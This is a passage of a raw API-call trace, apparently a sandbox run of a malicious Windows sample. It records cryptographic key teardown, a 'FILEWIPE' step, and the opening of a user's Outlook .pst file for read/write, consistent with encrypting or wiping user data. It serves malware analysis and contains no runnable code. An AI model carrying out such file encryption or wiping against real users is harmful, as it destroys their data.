pdwDataLen=0x87e820*=0x42400, dwBufLen=0x42410 | out: pbData=0xb03828*, pdwDataLen=0x87e820*=0x42410) returned 1 [0176.352] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.372] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0176.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.372] CryptDestroyKey (hKey=0x90af98) returned 1 [0176.376] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.376] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.376] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.376] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0176.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.376] FreeLibrary (hLibModule=0x74f20000) returned 1 [0176.379] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0176.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x90ae18 [0176.380] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0176.380] CharLowerBuffW (in: lpsz="byte[271360]", cchLength=0xc | out: lpsz="byte[271360]") returned 0xc [0176.382] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0176.382] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0176.382] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2828 [0176.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2828, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.383] FreeLibrary (hLibModule=0x75c90000) returned 1 [0176.384] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0176.398] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0176.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0176.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.398] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0176.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0176.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0176.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0176.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.402] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0176.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0176.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0176.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0176.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 